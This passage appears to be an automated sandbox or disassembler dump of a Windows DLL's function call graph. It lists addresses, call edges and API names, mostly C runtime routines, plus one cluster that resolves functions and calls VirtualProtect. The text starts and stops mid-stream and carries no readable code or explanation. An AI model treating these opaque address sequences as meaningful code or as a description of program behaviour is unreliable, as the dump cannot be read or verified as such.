5968->5966 5969->5951 5970->5969 5971->5963 5977 10004793 5972->5977 5974 10004765 5975 10002ada _ValidateLocalCookies 5 API calls 5974->5975 5976 1000478f 5975->5976 5976->5925 5978 1000479f ___scrt_is_nonwritable_in_current_image 5977->5978 5983 10005671 RtlEnterCriticalSection 5978->5983 5980 100047aa 5984 100047dc 5980->5984 5982 100047d1 _abort 5982->5974 5983->5980 5987 100056b9 RtlLeaveCriticalSection 5984->5987 5986 100047e3 5986->5982 5987->5986 5994 10005854 5988->5994 5990 10005938 5991 100058c4 5990->5991 6005 10005758 5991->6005 5993 100058e8 5993->5865 5995 10005860 ___scrt_is_nonwritable_in_current_image 5994->5995 6000 10005671 RtlEnterCriticalSection 5995->6000 5997 1000586a 6001 10005890 5997->6001 5999 10005888 _abort 5999->5990 6000->5997 6004 100056b9 RtlLeaveCriticalSection 6001->6004 6003 1000589a 6003->5999 6004->6003 6006 10005764 ___scrt_is_nonwritable_in_current_image 6005->6006 6013 10005671 RtlEnterCriticalSection 6006->6013 6008 1000576e 6014 10005a7f 6008->6014 6010 10005786 6018 1000579c 6010->6018 6012 10005794 _abort 6012->5993 6013->6008 6015 10005ab5 __fassign 6014->6015 6016 10005a8e __fassign 6014->6016 6015->6010 6016->6015 6021 10007cc2 6016->6021 6135 100056b9 RtlLeaveCriticalSection 6018->6135 6020 100057a6 6020->6012 6022 10007d42 6021->6022 6025 10007cd8 6021->6025 6023 10007d90 6022->6023 6026 1000571e _free 20 API calls 6022->6026 6089 10007e35 6023->6089 6025->6022 6027 10007d0b 6025->6027 6032 1000571e _free 20 API calls 6025->6032 6028 10007d64 6026->6028 6029 10007d2d 6027->6029 6034 1000571e _free 20 API calls 6027->6034 6030 1000571e _free 20 API calls 6028->6030 6031 1000571e _free 20 API calls 6029->6031 6033 10007d77 6030->6033 6036 10007d37 6031->6036 6038 10007d00 6032->6038 6035 1000571e _free 20 API calls 6033->6035 6040 10007d22 6034->6040 6041 10007d85 6035->6041 6042 1000571e _free 20 API calls 6036->6042 6037 10007dfe 6043 1000571e _free 20 API calls 6037->6043 6049 100090ba 6038->6049 6039 10007d9e 6039->6037 6047 1000571e 20 API calls _free 6039->6047 6077 100091b8 6040->6077 6046 1000571e _free 20 API calls 6041->6046 6042->6022 6048 10007e04 6043->6048 6046->6023 6047->6039 6048->6015 6050 100090cb 6049->6050 6076 100091b4 6049->6076 6051 100090dc 6050->6051 6052 1000571e _free 20 API calls 6050->6052 6053 100090ee 6051->6053 6055 1000571e _free 20 API calls 6051->6055 6052->6051 6054 10009100 6053->6054 6056 1000571e _free 20 API calls 6053->6056 6057 10009112 6054->6057 6058 1000571e _free 20 API calls 6054->6058 6055->6053 6056->6054 6059 10009124 6057->6059 6060 1000571e _free 20 API calls 6057->6060 6058->6057 6061 10009136 6059->6061 6063 1000571e _free 20 API calls 6059->6063 6060->6059 6062 10009148 6061->6062 6064 1000571e _free 20 API calls 6061->6064 6065 1000915a 6062->6065 6066 1000571e _free 20 API calls 6062->6066 6063->6061 6064->6062 6067 1000571e _free 20 API calls 6065->6067 6070 1000916c 6065->6070 6066->6065 6067->6070 6068 10009190 6073 100091a2 6068->6073 6074 1000571e _free 20 API calls 6068->6074 6069 1000917e 6069->6068 6072 1000571e _free 20 API calls 6069->6072 6070->6069 6071 1000571e _free 20 API calls 6070->6071 6071->6069 6072->6068 6075 1000571e _free 20 API calls 6073->6075 6073->6076 6074->6073 6075->6076 6076->6027 6078 100091c5 6077->6078 6088 1000921d 6077->6088 6079 1000571e _free 20 API calls 6078->6079 6080 100091d5 6078->6080 6079->6080 6081 100091e7 6080->6081 6082 1000571e _free 20 API calls 6080->6082 6083 100091f9 6081->6083 6085 1000571e _free 20 API calls 6081->6085 6082->6081 6084 1000920b 6083->6084 6086 1000571e _free 20 API calls 6083->6086 6087 1000571e _free 20 API calls 6084->6087 6084->6088 6085->6083 6086->6084 6087->6088 6088->6029 6090 10007e60 6089->6090 6091 10007e42 6089->6091 6090->6039 6091->6090 6095 1000925d 6091->6095 6094 1000571e _free 20 API calls 6094->6090 6096 10007e5a 6095->6096 6097 1000926e 6095->6097 6096->6094 6131 10009221 6097->6131 6100 10009221 __fassign 20 API calls 6101 10009281 6100->6101 6102 10009221 __fassign 20 API calls 6101->6102 6103 1000928c 6102->6103 6104 10009221 __fassign 20 API calls 6103->6104 6105 10009297 6104->6105 6106 10009221 __fassign 20 API calls 6105->6106 6107 100092a5 6106->6107 6108 1000571e _free 20 API calls 6107->6108 6109 100092b0 6108->6109 6110 1000571e _free 20 API calls 6109->6110 6111 100092bb 6110->6111 6112 1000571e _free 20 API calls 6111->6112 6113 100092c6 6112->6113 6114 10009221 __fassign 20 API calls 6113->6114 6115 100092d4 6114->6115 6116 10009221 __fassign 20 API calls 6115->6116 6117 100092e2 6116->6117 6118 10009221 __fassign 20 API calls 6117->6118 6119 100092f3 6118->6119 6120 10009221 __fassign 20 API calls 6119->6120 6121 10009301 6120->6121 6122 10009221 __fassign 20 API calls 6121->6122 6123 1000930f 6122->6123 6124 1000571e _free 20 API calls 6123->6124 6125 1000931a 6124->6125 6126 1000571e _free 20 API calls 6125->6126 6127 10009325 6126->6127 6128 1000571e _free 20 API calls 6127->6128 6129 10009330 6128->6129 6130 1000571e _free 20 API calls 6129->6130 6130->6096 6132 10009258 6131->6132 6133 10009248 6131->6133 6132->6100 6133->6132 6134 1000571e _free 20 API calls 6133->6134 6134->6133 6135->6020 6175 10007581 6136->6175 6139 1000766e 6140 1000767a _abort 6139->6140 6142 100076a1 _abort 6140->6142 6146 100076a7 _abort 6140->6146 6189 10005b7a GetLastError 6140->6189 6143 100076f3 6142->6143 6142->6146 6165 100076d6 6142->6165 6144 10006368 __dosmaperr 20 API calls 6143->6144 6145 100076f8 6144->6145 6208 100062ac 6145->6208 6151 1000771f 6146->6151 6211 10005671 RtlEnterCriticalSection 6146->6211 6152 1000777e 6151->6152 6154 10007776 6151->6154 6162 100077a9 6151->6162 6212 100056b9 RtlLeaveCriticalSection 6151->6212 6152->6162 6213 10007665 6152->6213 6157 10004bc1 _abort 28 API calls 6154->6157 6157->6152 6160 10005af6 _abort 38 API calls 6163 1000780c 6160->6163 6161 10007665 _abort 38 API calls 6161->6162 6216 1000782e 6162->6216 6164 10005af6 _abort 38 API calls 6163->6164 6163->6165 6164->6165 6220 1000bdc9 6165->6220 6167 100060fe ___scrt_fastfail 6166->6167 6168 1000612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6167->6168 6171 100061fb ___scrt_fastfail 6168->6171 6169 10002ada _ValidateLocalCookies 5 API calls 6170 10006219 6169->6170 6170->5949 6171->6169 6239 1000499b 6172->6239 6178 10007527 6175->6178 6177 100055ad 6177->5942 6177->6139 6179 10007533 ___scrt_is_nonwritable_in_current_image 6178->6179 6184 10005671 RtlEnterCriticalSection 6179->6184 6181 10007541 6185 10007575 6181->6185 6183 10007568 _abort 6183->6177 6184->6181 6188 100056b9 RtlLeaveCriticalSection 6185->6188 6187 1000757f 6187->6183 6188->6187 6190 10005b93 6189->6190 6191 10005b99 6189->6191 6192 10005e08 _abort 11 API calls 6190->6192 6193 1000637b _abort 17 API calls 6191->6193 6196 10005bf0 SetLastError 6191->6196 6192->6191 6194 10005bab 6193->6194 6195 10005bb3 6194->6195 6198 10005e5e _abort 11 API calls 6194->6198 6199 1000571e _free 17 API calls 6195->6199 6197 10005bf9 6196->6197 6197->6142 6200 10005bc8 6198->6200 6201 10005bb9 6199->6201 6200->6195 6202 10005bcf 6200->6202 6203 10005be7 SetLastError 6201->6203 6204 1000593c _abort 17 API calls 6202->6204 6203->6197 6205 10005bda 6204->6205 6206 1000571e _free 17 API calls 6205->6206 6207 10005be0 6206->6207 6207->6196 6207->6203 6223 10006231 6208->6223 6210 100062b8 6210->6165 6211->6151 6212->6154 6214 10005af6 _abort 38 API calls 6213->6214 6215 1000766a 6214->6215 6215->6161 6217 10007834 6216->6217 6218 100077fd 6216->6218 6238 100056b9 RtlLeaveCriticalSection 6217->6238 6218->6160 6218->6163 6218->6165 6221 10002ada _ValidateLocalCookies 5 API calls 6220->6221 6222 1000bdd4 6221->6222 6222->6222 6224 10005b7a __dosmaperr 20 API calls 6223->6224 6225 10006247 6224->6225 6226 100062a6 6225->6226 6229 10006255 6225->6229 6234 100062bc IsProcessorFeaturePresent 6226->6234 6228 100062ab 6230 10006231 ___std_exception_copy 26 API calls 6228->6230 6231 10002ada _ValidateLocalCookies 5 API calls 6229->6231 6232 100062b8 6230->6232 6233 1000627c 6231->6233 6232->6210 6233->6210 6235 100062c7 6234->6235 6236 100060e2 _abort 8 API calls 6235->6236 6237 100062dc GetCurrentProcess TerminateProcess 6236->6237 6237->6228 6238->6218 6240 100049a7 _abort 6239->6240 6247 100049bf 6240->6247 6261 10004af5 GetModuleHandleW 6240->6261 6244 10004a65 6278 10004aa5 6244->6278 6270 10005671 RtlEnterCriticalSection 6247->6270 6249 10004a3c 6251 10004a54 6249->6251 6274 10004669 6249->6274 6250 100049c7 6250->6244 6250->6249 6271 1000527a 6250->6271 6257 10004669 _abort 5 API calls 6251->6257 6252 10004a82 6281 10004ab4 6252->6281 6253 10004aae 6255 1000bdc9 _abort 5 API calls 6253->6255 6260 10004ab3 6255->6260 6257->6244 6262 100049b3 6261->6262 6262->6247 6263 10004b39 GetModuleHandleExW 6262->6263 6264 10004b63 GetProcAddress 6263->6264 6265 10004b78 6263->6265 6264->6265 6266 10004b95 6265->6266 6267 10004b8c FreeLibrary 6265->6267 6268 10002ada _ValidateLocalCookies 5 API calls 6266->6268 6267->6266 6269 10004b9f 6268->6269 6269->6247 6270->6250 6289 10005132 6271->6289 6275 10004698 6274->6275 6276 10002ada _ValidateLocalCookies 5 API calls 6275->6276 6277 100046c1 6276->6277 6277->6251 6311 100056b9 RtlLeaveCriticalSection 6278->6311 6280 10004a7e 6280->6252 6280->6253 6312 10006025 6281->6312 6284 10004ae2 6287 10004b39 _abort 8 API calls 6284->6287 6285 10004ac2 GetPEB 6285->6284 6286 10004ad2 GetCurrentProcess TerminateProcess 6285->6286 6286->6284 6288 10004aea ExitProcess 6287->6288 6292 100050e1 6289->6292 6291 10005156 6291->6249 6293 100050ed ___scrt_is_nonwritable_in_current_image 6292->6293 6300 10005671 RtlEnterCriticalSection 6293->6300 6295 100050fb 6301 1000515a 6295->6301 6299 10005119 _abort 6299->6291 6300->6295 6304 10005182 6301->6304 6305 1000517a 6301->6305 6302 10002ada _ValidateLocalCookies 5 API calls 6303 10005108 6302->6303 6307 10005126 6303->6307 6304->6305 6306 1000571e _free 20 API calls 6304->6306 6305->6302 6306->6305 6310 100056b9 RtlLeaveCriticalSection 6307->6310 6309 10005130 6309->6299 6310->6309 6311->6280 6313 10006040 6312->6313 6314 1000604a 6312->6314 6316 10002ada _ValidateLocalCookies 5 API calls 6313->6316 6315 10005c45 _abort 5 API calls 6314->6315 6315->6313 6317 10004abe 6316->6317 6317->6284 6317->6285 6318->5872 6322 100056b9 RtlLeaveCriticalSection 6319->6322 6321 10006e16 6321->5872 6322->6321 6324 100054ba 6323->6324 6325 100054c4 6323->6325 6324->5880 6324->5881 6325->6324 6326 10005af6 _abort 38 API calls 6325->6326 6327 100054e5 6326->6327 6331 10007a00 6327->6331 6332 10007a13 6331->6332 6333 100054fe 6331->6333 6332->6333 6339 10007f0f 6332->6339 6335 10007a2d 6333->6335 6336 10007a40 6335->6336 6337 10007a55 6335->6337 6336->6337 6338 10006d7e __fassign 38 API calls 6336->6338 6337->6324 6338->6337 6340 10007f1b ___scrt_is_nonwritable_in_current_image 6339->6340 6341 10005af6 _abort 38 API calls 6340->6341 6342 10007f24 6341->6342 6343 10007f72 _abort 6342->6343 6351 10005671 RtlEnterCriticalSection 6342->6351 6343->6333 6345 10007f42 6352 10007f86 6345->6352 6350 100055a8 _abort 38 API calls 6350->6343 6351->6345 6353 10007f56 6352->6353 6354 10007f94 __fassign 6352->6354 6356 10007f75 6353->6356 6354->6353 6355 10007cc2 __fassign 20 API calls 6354->6355 6355->6353 6359 100056b9 RtlLeaveCriticalSection 6356->6359 6358 10007f69 6358->6343 6358->6350 6359->6358 6361 10006baf 6360->6361 6366 10006b05 6360->6366 6363 10002ada _ValidateLocalCookies 5 API calls 6361->6363 6365 10006c5b 6363->6365 6365->5898 6370 100086e4 6366->6370 6369 10008a3e 43 API calls 6369->6361 6371 100054a7 __fassign 38 API calls 6370->6371 6373 10008704 MultiByteToWideChar 6371->6373 6374 10008742 6373->6374 6375 100087da 6373->6375 6377 100056d0 21 API calls 6374->6377 6380 10008763 ___scrt_fastfail 6374->6380 6376 10002ada _ValidateLocalCookies 5 API calls 6375->6376 6378 10006b66 6376->6378 6377->6380 6384 10008a3e 6378->6384 6379 100087d4 6389 10008801 6379->6389 6380->6379 6382 100087a8 MultiByteToWideChar 6380->6382 6382->6379 6383 100087c4 GetStringTypeW 6382->6383 6383->6379 6385 100054a7 __fassign 38 API calls 6384->6385 6386 10008a51 6385->6386 6393 10008821 6386->6393 6390 1000880d 6389->6390 6391 1000881e 6389->6391 6390->6391 6392 1000571e _free 20 API calls 6390->6392 6391->6375 6392->6391 6395 1000883c 6393->6395 6394 10008862 MultiByteToWideChar 6396 1000888c 6394->6396 6407 10008a16 6394->6407 6395->6394 6401 100056d0 21 API calls 6396->6401 6403 100088ad 6396->6403 6397 10002ada _ValidateLocalCookies 5 API calls 6398 10006b87 6397->6398 6398->6369 6399 100088f6 MultiByteToWideChar 6400 10008962 6399->6400 6402 1000890f 6399->6402 6405 10008801 __freea 20 API calls 6400->6405 6401->6403 6420 10005f19 6402->6420 6403->6399 6403->6400 6405->6407 6407->6397 6408 10008971 6410 100056d0 21 API calls 6408->6410 6413 10008992 6408->6413 6409 10008939 6409->6400 6411 10005f19 11 API calls 6409->6411 6410->6413 6411->6400 6412 10008a07 6415 10008801 __freea 20 API calls 6412->6415 6413->6412 6414 10005f19 11 API calls 6413->6414 6416 100089e6 6414->6416 6415->6400 6416->6412 6417 100089f5 WideCharToMultiByte 6416->6417 6417->6412 6418 10008a35 6417->6418 6419 10008801 __freea 20 API calls 6418->6419 6419->6400 6421 10005c45 _abort 5 API calls 6420->6421 6422 10005f40 6421->6422 6425 10005f49 6422->6425 6428 10005fa1 6422->6428 6426 10002ada _ValidateLocalCookies 5 API calls 6425->6426 6427 10005f9b 6426->6427 6427->6400 6427->6408 6427->6409 6429 10005c45 _abort 5 API calls 6428->6429 6430 10005fc8 6429->6430 6431 10002ada _ValidateLocalCookies 5 API calls 6430->6431 6432 10005f89 LCMapStringW 6431->6432 6432->6425 6434 10006892 ___scrt_is_nonwritable_in_current_image 6433->6434 6441 10005671 RtlEnterCriticalSection 6434->6441 6436 1000689c 6442 100068f1 6436->6442 6440 100068b5 _abort 6440->5912 6441->6436 6454 10007011 6442->6454 6444 1000693f 6445 10007011 26 API calls 6444->6445 6446 1000695b 6445->6446 6447 10007011 26 API calls 6446->6447 6448 10006979 6447->6448 6449 100068a9 6448->6449 6450 1000571e _free 20 API calls 6448->6450 6451 100068bd 6449->6451 6450->6449 6468 100056b9 RtlLeaveCriticalSection 6451->6468 6453 100068c7 6453->6440 6455 10007022 6454->6455 6464 1000701e 6454->6464 6456 10007029 6455->6456 6460 1000703c ___scrt_fastfail 6455->6460 6457 10006368 __dosmaperr 20 API calls 6456->6457 6458 1000702e 6457->6458 6459 100062ac ___std_exception_copy 26 API calls 6458->6459 6459->6464 6461 10007073 6460->6461 6462 1000706a 6460->6462 6460->6464 6461->6464 6466 10006368 __dosmaperr 20 API calls 6461->6466 6463 10006368 __dosmaperr 20 API calls 6462->6463 6465 1000706f 6463->6465 6464->6444 6467 100062ac ___std_exception_copy 26 API calls 6465->6467 6466->6465 6467->6464 6468->6453 7507 10007260 GetStartupInfoW 7508 10007286 7507->7508 7510 10007318 7507->7510 7508->7510 7513 10008be3 7508->7513 7511 100072af 7511->7510 7512 100072dd GetFileType 7511->7512 7512->7511 7514 10008bef ___scrt_is_nonwritable_in_current_image 7513->7514 7515 10008c13 7514->7515 7516 10008bfc 7514->7516 7526 10005671 RtlEnterCriticalSection 7515->7526 7517 10006368 __dosmaperr 20 API calls 7516->7517 7519 10008c01 7517->7519 7520 100062ac ___std_exception_copy 26 API calls 7519->7520 7521 10008c0b _abort 7520->7521 7521->7511 7522 10008c4b 7534 10008c72 7522->7534 7524 10008c1f 7524->7522 7527 10008b34 7524->7527 7526->7524 7528 1000637b _abort 20 API calls 7527->7528 7529 10008b46 7528->7529 7532 10005eb7 11 API calls 7529->7532 7533 10008b53 7529->7533 7530 1000571e _free 20 API calls 7531 10008ba5 7530->7531 7531->7524 7532->7529 7533->7530 7537 100056b9 RtlLeaveCriticalSection 7534->7537 7536 10008c79 7536->7521 7537->7536 7645 100081a0 7646 100081d9 7645->7646 7647 100081dd 7646->7647 7658 10008205 7646->7658 7648 10006368 __dosmaperr 20 API calls 7647->7648 7649 100081e2 7648->7649 7651 100062ac ___std_exception_copy 26 API calls 7649->7651 7650 10008529 7652 10002ada _ValidateLocalCookies 5 API calls 7650->7652 7653 100081ed 7651->7653 7654 10008536 7652->7654 7655 10002ada _ValidateLocalCookies 5 API calls 7653->7655 7657 100081f9 7655->7657 7658->7650 7659 100080c0 7658->7659 7660 100080db 7659->7660 7661 10002ada _ValidateLocalCookies 5 API calls 7660->7661 7662 10008152 7661->7662 7662->7658 7846 1000a1e0 7849 1000a1fe 7846->7849 7848 1000a1f6 7851 1000a203 7849->7851 7850 1000aa53 21 API calls 7853 1000a42f 7850->7853 7851->7850 7852 1000a298 7851->7852 7852->7848 7853->7848 7538 10009d61 7539 10009d81 7538->7539 7542 10009db8 7539->7542 7541 10009dab 7544 10009dbf 7542->7544 7543 10009e20 7545 1000a90e 7543->7545 7546 1000aa17 21 API calls 7543->7546 7544->7543 7548 10009ddf 7544->7548 7545->7541 7547 10009e6e 7546->7547 7547->7541 7548->7545 7549 1000aa17 21 API calls 7548->7549 7550 1000a93e 7549->7550 7550->7541 7663 100021a1 ___scrt_dllmain_exception_filter 6469 1000c7a7 6470 1000c7be 6469->6470 6476 1000c82c 6469->6476 6470->6476 6481 1000c7e6 GetModuleHandleA 6470->6481 6472 1000c835 GetModuleHandleA 6475 1000c83f 6472->6475 6473 1000c872 6474 1000c7dd 6474->6475 6474->6476 6478 1000c800 GetProcAddress 6474->6478 6475->6476 6477 1000c85f GetProcAddress 6475->6477 6476->6472 6476->6473 6476->6475 6477->6476 6478->6476 6479 1000c80d VirtualProtect 6478->6479 6479->6476 6480 1000c81c VirtualProtect 6479->6480 6480->6476 6482 1000c7ef 6481->6482 6490 1000c82c 6481->6490 6493 1000c803 GetProcAddress 6482->6493 6484 1000c7f4 6487 1000c800 GetProcAddress 6484->6487 6484->6490 6485 1000c872 6486 1000c835 GetModuleHandleA 6489 1000c83f 6486->6489 6488 1000c80d VirtualProtect 6487->6488 6487->6490 6488->6490 6491 1000c81c VirtualProtect 6488->6491 6489->6490 6492 1000c85f GetProcAddress 6489->6492 6490->6485 6490->6486 6490->6489 6491->6490 6492->6490 6494 1000c82c 6493->6494 6495 1000c80d VirtualProtect 6493->6495 6497 1000c872 6494->6497 6498 1000c835 GetModuleHandleA 6494->6498 6495->6494 6496 1000c81c VirtualProtect 6495->6496 6496->6494 6500 1000c83f 6498->6500 6499 1000c85f GetProcAddress 6499->6500 6500->6494 6500->6499 7010 1000742b 7011 10007430 7010->7011 7012 10007453 7011->7012 7014 10008bae 7011->7014 7015 10008bdd 7014->7015 7016 10008bbb 7014->7016 7015->7011 7017 10008bd7 7016->7017 7018 10008bc9 RtlDeleteCriticalSection 7016->7018 7019 1000571e _free 20 API calls 7017->7019 7018->7017 7018->7018 7019->7015 7551 1000ac6b 7552 1000ac84 __startOneArgErrorHandling 7551->7552 7554 1000acad __startOneArgErrorHandling 7552->7554 7555 1000b2f0 7552->7555 7556 1000b329 __startOneArgErrorHandling 7555->7556 7557 1000b5c1 __raise_exc RaiseException 7556->7557 7558 1000b350 __startOneArgErrorHandling 7556->7558 7557->7558 7559 1000b393 7558->7559 7560 1000b36e 7558->7560 7561 1000b8b2 __startOneArgErrorHandling 20 API calls 7559->7561 7566 1000b8e1 7560->7566 7563 1000b38e __startOneArgErrorHandling 7561->7563 7564 10002ada _ValidateLocalCookies 5 API calls 7563->7564 7565 1000b3b7 7564->7565 7565->7554 7567 1000b8f0 7566->7567 7568 1000b90f __startOneArgErrorHandling 7567->7568 7569 1000b964 __startOneArgErrorHandling 7567->7569 7570 100078a3 __startOneArgErrorHandling 5 API calls 7568->7570 7571 1000b8b2 __startOneArgErrorHandling 20 API calls 7569->7571 7572 1000b950 7570->7572 7574 1000b95d 7571->7574 7573 1000b8b2 __startOneArgErrorHandling 20 API calls 7572->7573 7572->7574 7573->7574 7574->7563 7664 100060ac 7665 100060b7 7664->7665 7667 100060dd 7664->7667 7666 100060c7 FreeLibrary 7665->7666 7665->7667 7666->7665 7575 1000506f 7576 10005081 7575->7576 7577 10005087 7575->7577 7578 10005000 20 API calls 7576->7578 7578->7577 7020 10005630 7021 1000563b 7020->7021 7023 10005664 7021->7023 7025 10005660 7021->7025 7026 10005eb7 7021->7026 7033 10005688 7023->7033 7027 10005c45 _abort 5 API calls 7026->7027 7028 10005ede 7027->7028 7029 10005efc InitializeCriticalSectionAndSpinCount 7028->7029 7032 10005ee7 7028->7032 7029->7032 7030 10002ada _ValidateLocalCookies 5 API calls 7031 10005f13 7030->7031 7031->7021 7032->7030 7034 100056b4 7033->7034 7035 10005695 7033->7035 7034->7025 7036 1000569f RtlDeleteCriticalSection 7035->7036 7036->7034 7036->7036 7579 10003370 7590 10003330 7579->7590 7591 10003342 7590->7591 7592 1000334f 7590->7592 7593 10002ada _ValidateLocalCookies 5 API calls 7591->7593 7593->7592 7854 100063f0 7855 10006400 7854->7855 7858 10006416 7854->7858 7856 10006368 __dosmaperr 20 API calls 7855->7856 7857 10006405 7856->7857 7860 100062ac ___std_exception_copy 26 API calls 7857->7860 7861 10006480 7858->7861 7866 10006561 7858->7866 7873 10006580 7858->7873 7859 10004e76 20 API calls 7862 100064e5 7859->7862 7868 1000640f 7860->7868 7861->7859 7864 100064ee 7862->7864 7870 10006573 7862->7870 7884 100085eb 7862->7884 7865 1000571e _free 20 API calls 7864->7865 7865->7866 7893 1000679a 7866->7893 7871 100062bc ___std_exception_copy 11 API calls 7870->7871 7872 1000657f 7871->7872 7874 1000658c 7873->7874 7874->7874 7875 1000637b _abort 20 API calls 7874->7875 7876 100065ba 7875->7876 7877 100085eb 26 API calls 7876->7877 7878 100065e6 7877->7878 7879 100062bc ___std_exception_copy 11 API calls 7878->7879 7880 10006615 ___scrt_fastfail 7879->7880 7881 100066b6 FindFirstFileExA 7880->7881 7882 10006705 7881->7882 7883 10006580 26 API calls 7882->7883 7887 1000853a 7884->7887 7885 1000854f 7886 10006368 __dosmaperr 20 API calls 7885->7886 7888 10008554 7885->7888 7892 1000857a 7886->7892 7887->7885 7887->7888 7890 1000858b 7887->7890 7888->7862 7889 100062ac ___std_exception_copy 26 API calls 7889->7888 7890->7888 7891 10006368 __dosmaperr 20 API calls 7890->7891 7891->7892 7892->7889 7897 100067a4 7893->7897 7894 100067b4 7896 1000571e _free 20 API calls 7894->7896 7895 1000571e _free 20 API calls 7895->7897 7898 100067bb 7896->7898 7897->7894 7897->7895 7898->7868 7594 10009e71 7595 10009e95 7594->7595 7596 10009ee6 7595->7596 7598 10009f71 __startOneArgErrorHandling 7595->7598 7599 10009ef8 7596->7599 7602 1000aa53 7596->7602 7600 1000b2f0 21 API calls 7598->7600 7601 1000acad __startOneArgErrorHandling 7598->7601 7600->7601 7603 1000aa70 RtlDecodePointer 7602->7603 7604 1000aa80 7602->7604 7603->7604 7605 1000ab0d 7604->7605 7608 1000ab02 7604->7608 7610 1000aab7 7604->7610 7605->7608 7609 10006368 __dosmaperr 20 API calls 7605->7609 7606 10002ada _ValidateLocalCookies 5 API calls 7607 1000ac67 7606->7607 7607->7599 7608->7606 7609->7608 7610->7608 7611 10006368 __dosmaperr 20 API calls 7610->7611 7611->7608 7672 10003eb3 7673 10005411 38 API calls 7672->7673 7674 10003ebb 7673->7674 7037 1000543d 7038 10005440 7037->7038 7039 100055a8 _abort 38 API calls 7038->7039 7040 1000544c 7039->7040 6808 10001f3f 6809 10001f4b ___scrt_is_nonwritable_in_current_image 6808->6809 6826 1000247c 6809->6826 6811 10001f52 6812 10002041 6811->6812 6813 10001f7c 6811->6813 6820 10001f57 ___scrt_is_nonwritable_in_current_image 6811->6820 6849 10002639 IsProcessorFeaturePresent 6812->6849 6837 100023de 6813->6837 6816 10002048 6817 10001f8b __RTC_Initialize 6817->6820 6840 100022fc RtlInitializeSListHead 6817->6840 6819 10001f99 ___scrt_initialize_default_local_stdio_options 6841 100046c5 6819->6841 6824 10001fb8 6824->6820 6825 10004669 _abort 5 API calls 6824->6825 6825->6820 6827 10002485 6826->6827 6853 10002933 IsProcessorFeaturePresent 6827->6853 6831 1000249a 6831->6811 6832 10002496 6832->6831 6864 100053c8 6832->6864 6835 100024b1 6835->6811 6920 100024b5 6837->6920 6839 100023e5 6839->6817 6840->6819 6842 100046dc 6841->6842 6843 10002ada _ValidateLocalCookies 5 API calls 6842->6843 6844 10001fad 6843->6844 6844->6820 6845 100023b3 6844->6845 6846 100023b8 ___scrt_release_startup_lock 6845->6846 6847 10002933 ___isa_available_init IsProcessorFeaturePresent 6846->6847 6848 100023c1 6846->6848 6847->6848 6848->6824 6850 1000264e ___scrt_fastfail 6849->6850 6851 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6850->6851 6852 10002744 ___scrt_fastfail 6851->6852 6852->6816 6854 10002491 6853->6854 6855 100034ea 6854->6855 6856 100034ef ___vcrt_initialize_winapi_thunks 6855->6856 6875 10003936 6856->6875 6860 10003505 6861 10003510 6860->6861 6889 10003972 6860->6889 6861->6832 6863 100034fd 6863->6832 6912 10007457 6864->6912 6867 10003529 6868 10003532 6867->6868 6869 10003543 6867->6869 6870 1000391b ___vcrt_uninitialize_ptd 6 API calls 6868->6870 6869->6831 6871 10003537 6870->6871 6872 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6871->6872 6873 1000353c 6872->6873 6916 10003c50 6873->6916 6876 1000393f 6875->6876 6878 10003968 6876->6878 6879 100034f9 6876->6879 6893 10003be0 6876->6893 6880 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6878->6880 6879->6863 6881 100038e8 6879->6881 6880->6879 6898 10003af1 6881->6898 6884 100038fd 6884->6860 6885 10003ba2 ___vcrt_FlsSetValue 6 API calls 6886 1000390b 6885->6886 6887 10003918 6886->6887 6903 1000391b 6886->6903 6887->6860 6890 1000399c 6889->6890 6891 1000397d 6889->6891 6890->6863 6892 10003987 RtlDeleteCriticalSection 6891->6892 6892->6890 6892->6892 6894 10003a82 try_get_function 5 API calls 6893->6894 6895 10003bfa 6894->6895 6896 10003c18 InitializeCriticalSectionAndSpinCount 6895->6896 6897 10003c03 6895->6897 6896->6897 6897->6876 6899 10003a82 try_get_function 5 API calls 6898->6899 6900 10003b0b 6899->6900 6901 10003b24 TlsAlloc 6900->6901 6902 100038f2 6900->6902 6902->6884 6902->6885 6904 1000392b 6903->6904 6905 10003925 6903->6905 6904->6884 6907 10003b2c 6905->6907 6908 10003a82 try_get_function 5 API calls 6907->6908 6909 10003b46 6908->6909 6910 10003b5e TlsFree 6909->6910 6911 10003b52 6909->6911 6910->6911 6911->6904 6915 10007470 6912->6915 6913 10002ada _ValidateLocalCookies 5 API calls 6914 100024a3 6913->6914 6914->6835 6914->6867 6915->6913 6917 10003c7f 6916->6917 6918 10003c59 6916->6918 6917->6869 6918->6917 6919 10003c69 FreeLibrary 6918->6919 6919->6918 6921 100024c4 6920->6921 6922 100024c8 6920->6922 6921->6839 6923 10002639 ___scrt_fastfail 4 API calls 6922->6923 6925 100024d5 ___scrt_release_startup_lock 6922->6925 6924 10002559 6923->6924 6925->6839 6926 10005bff 6934 10005d5c 6926->6934 6929 10005c13 6930 10005b7a __dosmaperr 20 API calls 6931 10005c1b 6930->6931 6932 10005c28 6931->6932 6941 10005c2b 6931->6941 6935 10005c45 _abort 5 API calls 6934->6935 6936 10005d83 6935->6936 6937 10005d9b TlsAlloc 6936->6937 6938 10005d8c 6936->6938 6937->6938 6939 10002ada _ValidateLocalCookies 5 API calls 6938->6939 6940 10005c09 6939->6940 6940->6929 6940->6930 6942 10005c35 6941->6942 6944 10005c3b 6941->6944 6945 10005db2 6942->6945 6944->6929 6946 10005c45 _abort 5 API calls 6945->6946 6947 10005dd9 6946->6947 6948 10005df1 TlsFree 6947->6948 6949 10005de5 6947->6949 6948->6949 6950 10002ada _ValidateLocalCookies 5 API calls 6949->6950 6951 10005e02 6950->6951 6951->6944 7675 100067bf 7680 100067f4 7675->7680 7678 100067db 7679 1000571e _free 20 API calls 7679->7678 7681 10006806 7680->7681 7690 100067cd 7680->7690 7682 10006836 7681->7682 7683 1000680b 7681->7683 7682->7690 7691 100071d6 7682->7691 7684 1000637b _abort 20 API calls 7683->7684 7686 10006814 7684->7686 7687 1000571e _free 20 API calls 7686->7687 7687->7690 7688 10006851 7689 1000571e _free 20 API calls 7688->7689 7689->7690 7690->7678 7690->7679 7692 100071e1 7691->7692 7693 10007209 7692->7693 7694 100071fa 7692->7694 7697 10007218 7693->7697 7700 10008a98 7693->7700 7695 10006368 __dosmaperr 20 API calls 7694->7695 7699 100071ff ___scrt_fastfail 7695->7699 7707 10008acb 7697->7707 7699->7688 7701 10008aa3 7700->7701 7702 10008ab8 RtlSizeHeap 7700->7702 